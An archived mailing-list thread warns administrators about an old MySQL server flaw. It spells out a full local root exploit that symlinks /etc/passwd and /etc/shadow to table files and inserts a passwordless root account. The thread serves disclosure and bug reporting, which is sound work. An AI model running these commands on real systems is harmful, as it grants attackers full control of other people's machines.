Hello This one appeared on a Debian mailing list. I know that this is fixed in the latest versions as they allow running the server as non-root user and so it is not considered as a bug (....) but I'm sure that there're administrators out there which are not aware of this exploiting method! bye, -christian- -- Christian Hammers WESTEND GmbH - Aachen und Dueren Tel 0241/701333-0 [EMAIL PROTECTED] Internet & Security for Professionals Fax 0241/911879 WESTEND ist CISCO Systems Partner - Premium Certified
Hi, At first, an apology if this came by earlier, i accidentally removed quite some debian-* mail, and i don't know of a -private archive for developers. As seen on some mailinglist, can't remember which one: $ cd /var/tmp $ ln -s /etc/passwd gotcha.ISD $ ln -s /etc/shadow make_me_r00t.ISD $ mysql -u user -h localhost -p somepassword '../../tmp' create table gotcha(qqq varchar(255)); create table make_me_r00t(qqq varchar(255)); insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n'); insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n'); \q Testing/unstable both have >=3.23-ish, stable has 3.22-ish. testing/unstable are not vulnerable, i didn't have a stable box at hand to try. Anyone who has tried this on stable? In my opinion, the whole idea of being able to specify an alternate database location to the mysql server is a problem, and I never have seen a real use for it (correct me if i'm wrong). I'm pondering on filing a bug against mysql-server for the whole alternate-location thing (bugs keep popping up with stuff ranging from these symlink tricks to stuff like 'select * from infile'-ish problems that allow reading from any file). Greets, Robert -- Linux Generation -- Please respect the privacy of this mailing list. To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
--------------------------------------------------------------------- Before posting, please check: http://www.mysql.com/manual.php (the manual) http://lists.mysql.com/ (the list archive) To request this thread, e-mail <[EMAIL PROTECTED]> To unsubscribe, e-mail <[EMAIL PROTECTED]> Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php